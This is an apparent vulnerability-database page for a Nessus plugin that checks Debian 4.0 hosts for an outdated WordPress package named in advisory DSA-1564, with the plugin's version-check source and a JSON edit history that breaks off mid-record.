Search...

Debian DSA-1564-1 : wordpress - multiple vulnerabilities

2008-05-02T00:00:00

ID DEBIAN_DSA-1564.NASL
Type nessus
Reporter This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2019-11-02T00:00:00

Description

Several remote vulnerabilities have been discovered in WordPress, a weblog manager. The Common Vulnerabilities and Exposures project identifies the following problems :

CVE-2007-3639 Insufficient input sanitising allowed for remote attackers to redirect visitors to external websites.

CVE-2007-4153 Multiple cross-site scripting vulnerabilities allowed remote authenticated administrators to inject arbitrary web script or HTML.

CVE-2007-4154 SQL injection vulnerability allowed allowed remote authenticated administrators to execute arbitrary SQL commands.

CVE-2007-0540 WordPress allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a file with a binary content type, which is downloaded even though it cannot contain usable pingback data.

[no CVE name yet]

Insufficient input sanitising caused an attacker with a normal user account to access the administrative interface.

                                        
                                            #%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Debian Security Advisory DSA-1564. The text 
# itself is copyright (C) Software in the Public Interest, Inc.
#

include("compat.inc");

if (description)
{
  script_id(32126);
  script_version("1.16");
  script_cvs_date("Date: 2019/08/02 13:32:21");

  script_cve_id("CVE-2007-0540", "CVE-2007-3639", "CVE-2007-4153", "CVE-2007-4154");
  script_xref(name:"DSA", value:"1564");

  script_name(english:"Debian DSA-1564-1 : wordpress - multiple vulnerabilities");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Several remote vulnerabilities have been discovered in WordPress, a
weblog manager. The Common Vulnerabilities and Exposures project
identifies the following problems :

  - CVE-2007-3639
    Insufficient input sanitising allowed for remote
    attackers to redirect visitors to external websites.

  - CVE-2007-4153
    Multiple cross-site scripting vulnerabilities allowed
    remote authenticated administrators to inject arbitrary
    web script or HTML.

  - CVE-2007-4154
    SQL injection vulnerability allowed allowed remote
    authenticated administrators to execute arbitrary SQL
    commands.

  - CVE-2007-0540
    WordPress allows remote attackers to cause a denial of
    service (bandwidth or thread consumption) via pingback
    service calls with a source URI that corresponds to a
    file with a binary content type, which is downloaded
    even though it cannot contain usable pingback data.

  - [no CVE name yet]

    Insufficient input sanitising caused an attacker with a
    normal user account to access the administrative
    interface."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2007-3639"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2007-4153"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2007-4154"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2007-0540"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.debian.org/security/2008/dsa-1564"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"Upgrade the wordpress package.

For the stable distribution (etch), these problems have been fixed in
version 2.0.10-1etch2."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:wordpress");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:4.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2008/05/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2008/05/02");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"4.0", prefix:"wordpress", reference:"2.0.10-1etch2")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_warning(port:0, extra:deb_report_get());
  else security_warning(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "DEBIAN_DSA-1564.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-1564-1 : wordpress - multiple vulnerabilities", "description": "Several remote vulnerabilities have been discovered in WordPress, a\nweblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-3639\n Insufficient input sanitising allowed for remote\n attackers to redirect visitors to external websites.\n\n - CVE-2007-4153\n Multiple cross-site scripting vulnerabilities allowed\n remote authenticated administrators to inject arbitrary\n web script or HTML.\n\n - CVE-2007-4154\n SQL injection vulnerability allowed allowed remote\n authenticated administrators to execute arbitrary SQL\n commands.\n\n - CVE-2007-0540\n WordPress allows remote attackers to cause a denial of\n service (bandwidth or thread consumption) via pingback\n service calls with a source URI that corresponds to a\n file with a binary content type, which is downloaded\n even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a\n normal user account to access the administrative\n interface.", "published": "2008-05-02T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/32126", "reporter": "This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://security-tracker.debian.org/tracker/CVE-2007-4154", "https://security-tracker.debian.org/tracker/CVE-2007-3639", "https://security-tracker.debian.org/tracker/CVE-2007-4153", "https://security-tracker.debian.org/tracker/CVE-2007-0540", "https://www.debian.org/security/2008/dsa-1564"], "cvelist": ["CVE-2007-3639", "CVE-2007-0540", "CVE-2007-4153", "CVE-2007-4154"], "type": "nessus", "lastseen": "2019-11-01T02:21:01", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:wordpress"], "cvelist": ["CVE-2007-3639", "CVE-2007-0540", "CVE-2007-4153", "CVE-2007-4154"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Several remote vulnerabilities have been discovered in WordPress, a weblog manager. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2007-3639 Insufficient input sanitising allowed for remote attackers to redirect visitors to external websites.\n\n - CVE-2007-4153 Multiple cross-site scripting vulnerabilities allowed remote authenticated administrators to inject arbitrary web script or HTML.\n\n - CVE-2007-4154 SQL injection vulnerability allowed allowed remote authenticated administrators to execute arbitrary SQL commands.\n\n - CVE-2007-0540 WordPress allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a file with a binary content type, which is downloaded even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a normal user account to access the administrative interface.", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-02-21T01:10:54", "references": [{"idList": ["EDB-ID:29522"], "type": "exploitdb"}, {"idList": ["DEBIAN:DSA-1564-1:868BE"], "type": "debian"}, {"idList": ["OPENVAS:60930"], "type": "openvas"}, {"idList": ["OSVDB:39376", "OSVDB:39375", "OSVDB:39371", "OSVDB:33006", "OSVDB:39373", "OSVDB:39377", "OSVDB:39374", "OSVDB:39372"], "type": "osvdb"}, {"idList": ["SECURITYVULNS:VULN:7108"], "type": "securityvulns"}, {"idList": ["CVE-2007-3639", "CVE-2007-0540", "CVE-2007-4153", "CVE-2007-4154"], "type": "cve"}]}, "score": {"modified": "2019-02-21T01:10:54", "value": 6.7, "vector": "NONE"}}, "hash": "e018678af104cf98fa849af702dd4dce16ac87485268cecb24517233744124ae", "hashmap": [{"hash": "645c3d4edcceecd0e13424352e17afd4", "key": "title"}, {"hash": "53bf7d59f3ccac38d00309edeb45ba2e", "key": "published"}, {"hash": "ec2587d3b1b37a53f7139b936e10b1fc", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1ab33e67abf2e328df0220da67e931f7", "key": "cpe"}, {"hash": "1f0643149dd5c86751215fd0040675aa", "key": "pluginID"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "301e270775960584adf6393232c08b09", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "d76b4835ec756cec54ebd6ca72e939fb", "key": "cvelist"}, {"hash": "dbc5a0c3e1fc4a0b28e0aa44fcc37933", "key": "references"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}, {"hash": "7617dfe9ab86c252b9a061e5b3c8a9b7", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=32126", "id": "DEBIAN_DSA-1564.NASL", "lastseen": "2019-02-21T01:10:54", "modified": "2018-11-10T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "32126", "published": "2008-05-02T00:00:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2007-4154", "https://security-tracker.debian.org/tracker/CVE-2007-3639", "https://security-tracker.debian.org/tracker/CVE-2007-4153", "https://security-tracker.debian.org/tracker/CVE-2007-0540", "https://www.debian.org/security/2008/dsa-1564"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1564. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32126);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:33\");\n\n script_cve_id(\"CVE-2007-0540\", \"CVE-2007-3639\", \"CVE-2007-4153\", \"CVE-2007-4154\");\n script_xref(name:\"DSA\", value:\"1564\");\n\n script_name(english:\"Debian DSA-1564-1 : wordpress - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in WordPress, a\nweblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-3639\n Insufficient input sanitising allowed for remote\n attackers to redirect visitors to external websites.\n\n - CVE-2007-4153\n Multiple cross-site scripting vulnerabilities allowed\n remote authenticated administrators to inject arbitrary\n web script or HTML.\n\n - CVE-2007-4154\n SQL injection vulnerability allowed allowed remote\n authenticated administrators to execute arbitrary SQL\n commands.\n\n - CVE-2007-0540\n WordPress allows remote attackers to cause a denial of\n service (bandwidth or thread consumption) via pingback\n service calls with a source URI that corresponds to a\n file with a binary content type, which is downloaded\n even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a\n normal user account to access the administrative\n interface.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1564\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wordpress package.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.10-1etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"wordpress\", reference:\"2.0.10-1etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-1564-1 : wordpress - multiple vulnerabilities", "type": "nessus", "viewCount": 3}, "differentElements": ["cvss", "description", "reporter", "modified", "sourceData", "href"], "edition": 9, "lastseen": "2019-02-21T01:10:54"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:wordpress"], "cvelist": ["CVE-2007-3639", "CVE-2007-0540", "CVE-2007-4153", "CVE-2007-4154"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Several remote vulnerabilities have been discovered in WordPress, a weblog manager. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2007-3639 Insufficient input sanitising allowed for remote attackers to redirect visitors to external websites.\n\n - CVE-2007-4153 Multiple cross-site scripting vulnerabilities allowed remote authenticated administrators to inject arbitrary web script or HTML.\n\n - CVE-2007-4154 SQL injection vulnerability allowed allowed remote authenticated administrators to execute arbitrary SQL commands.\n\n - CVE-2007-0540 WordPress allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a file with a binary content type, which is downloaded even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a normal user account to access the administrative interface.", "edition": 4, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "73dc9a80d6549e44d588183741eaa78af00ecc43cf226ce619d0f66b8dac599d", "hashmap": [{"hash": "645c3d4edcceecd0e13424352e17afd4", "key": "title"}, {"hash": "53bf7d59f3ccac38d00309edeb45ba2e", "key": "published"}, {"hash": "ec2587d3b1b37a53f7139b936e10b1fc", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1ab33e67abf2e328df0220da67e931f7", "key": "cpe"}, {"hash": "1f0643149dd5c86751215fd0040675aa", "key": "pluginID"}, {"hash": "a03d359fb0b4e439f50091cee1f89df6", "key": "modified"}, {"hash": "301e270775960584adf6393232c08b09", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "29cffbf9fd05746ee5ed788650bbe28c", "key": "references"}, {"hash": "d76b4835ec756cec54ebd6ca72e939fb", "key": "cvelist"}, {"hash": "e94f5fcb716c0bce83db41465c2ae5a9", "key": "sourceData"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=32126", "id": "DEBIAN_DSA-1564.NASL", "lastseen": "2018-08-30T19:47:37", "modified": "2018-08-09T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "32126", "published": "2008-05-02T00:00:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2007-4154", "https://security-tracker.debian.org/tracker/CVE-2007-3639", "https://security-tracker.debian.org/tracker/CVE-2007-4153", "http://www.debian.org/security/2008/dsa-1564", "https://security-tracker.debian.org/tracker/CVE-2007-0540"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1564. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32126);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/09 17:06:37\");\n\n script_cve_id(\"CVE-2007-0540\", \"CVE-2007-3639\", \"CVE-2007-4153\", \"CVE-2007-4154\");\n script_xref(name:\"DSA\", value:\"1564\");\n\n script_name(english:\"Debian DSA-1564-1 : wordpress - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in WordPress, a\nweblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-3639\n Insufficient input sanitising allowed for remote\n attackers to redirect visitors to external websites.\n\n - CVE-2007-4153\n Multiple cross-site scripting vulnerabilities allowed\n remote authenticated administrators to inject arbitrary\n web script or HTML.\n\n - CVE-2007-4154\n SQL injection vulnerability allowed allowed remote\n authenticated administrators to execute arbitrary SQL\n commands.\n\n - CVE-2007-0540\n WordPress allows remote attackers to cause a denial of\n service (bandwidth or thread consumption) via pingback\n service calls with a source URI that corresponds to a\n file with a binary content type, which is downloaded\n even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a\n normal user account to access the administrative\n interface.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2008/dsa-1564\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wordpress package.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.10-1etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"wordpress\", reference:\"2.0.10-1etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-1564-1 : wordpress - multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:47:37"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:wordpress"], "cvelist": ["CVE-2007-3639", "CVE-2007-0540", "CVE-2007-4153", "CVE-2007-4154"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Several remote vulnerabilities have been discovered in WordPress, a weblog manager. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2007-3639 Insufficient input sanitising allowed for remote attackers to redirect visitors to external websites.\n\n - CVE-2007-4153 Multiple cross-site scripting vulnerabilities allowed remote authenticated administrators to inject arbitrary web script or HTML.\n\n - CVE-2007-4154 SQL injection vulnerability allowed allowed remote authenticated administrators to execute arbitrary SQL commands.\n\n - CVE-2007-0540 WordPress allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a file with a binary content type, which is downloaded even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a normal user account to access the administrative interface.", "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "3c029bc2af0e8b6419be6a9d392efe4c823793115a16bfa597f8da867f14a741", "hashmap": [{"hash": "645c3d4edcceecd0e13424352e17afd4", "key": "title"}, {"hash": "53bf7d59f3ccac38d00309edeb45ba2e", "key": "published"}, {"hash": "ec2587d3b1b37a53f7139b936e10b1fc", "key": "description"}, {"hash": "b420716887930ca0fceed44a5215c615", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1ab33e67abf2e328df0220da67e931f7", "key": "cpe"}, {"hash": "1f0643149dd5c86751215fd0040675aa", "key": "pluginID"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "301e270775960584adf6393232c08b09", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "58e36873cc722bb45204800266380b16", "key": "modified"}, {"hash": "29cffbf9fd05746ee5ed788650bbe28c", "key": "references"}, {"hash": "d76b4835ec756cec54ebd6ca72e939fb", "key": "cvelist"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=32126", "id": "DEBIAN_DSA-1564.NASL", "lastseen": "2017-10-29T13:40:28", "modified": "2014-05-03T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "32126", "published": "2008-05-02T00:00:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2007-4154", "https://security-tracker.debian.org/tracker/CVE-2007-3639", "https://security-tracker.debian.org/tracker/CVE-2007-4153", "http://www.debian.org/security/2008/dsa-1564", "https://security-tracker.debian.org/tracker/CVE-2007-0540"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1564. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32126);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2014/05/03 11:14:59 $\");\n\n script_cve_id(\"CVE-2007-0540\", \"CVE-2007-3639\", \"CVE-2007-4153\", \"CVE-2007-4154\");\n script_osvdb_id(40802, 46994, 46995);\n script_xref(name:\"DSA\", value:\"1564\");\n\n script_name(english:\"Debian DSA-1564-1 : wordpress - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in WordPress, a\nweblog manager. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-3639\n Insufficient input sanitising allowed for remote\n attackers to redirect visitors to external websites.\n\n - CVE-2007-4153\n Multiple cross-site scripting vulnerabilities allowed\n remote authenticated administrators to inject arbitrary\n web script or HTML.\n\n - CVE-2007-4154\n SQL injection vulnerability allowed allowed remote\n authenticated administrators to execute arbitrary SQL\n commands.\n\n - CVE-2007-0540\n WordPress allows remote attackers to cause a denial of\n service (bandwidth or thread consumption) via pingback\n service calls with a source URI that corresponds to a\n file with a binary content type, which is downloaded\n even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a\n normal user account to access the administrative\n interface.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2008/dsa-1564\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wordpress package.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.0.10-1etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2014 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"wordpress\", reference:\"2.0.10-1etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-1564-1 : wordpress - multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:40:28"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:wordpress"], "cvelist": ["CVE-2007-3639", "CVE-2007-0540", "CVE-2007-4153", "CVE-2007-4154"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Several remote vulnerabilities have been discovered in WordPress, a weblog manager. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2007-3639 Insufficient input sanitising allowed for remote attackers to redirect visitors to external websites.\n\n - CVE-2007-4153 Multiple cross-site scripting vulnerabilities allowed remote authenticated administrators to inject arbitrary web script or HTML.\n\n - CVE-2007-4154 SQL injection vulnerability allowed allowed remote authenticated administrators to execute arbitrary SQL commands.\n\n - CVE-2007-0540 WordPress allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a file with a binary content type, which is downloaded even though it cannot contain usable pingback data.\n\n - [no CVE name yet]\n\n Insufficient input sanitising caused an attacker with a normal user account to access the administrative interface.", "edition": 6, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": 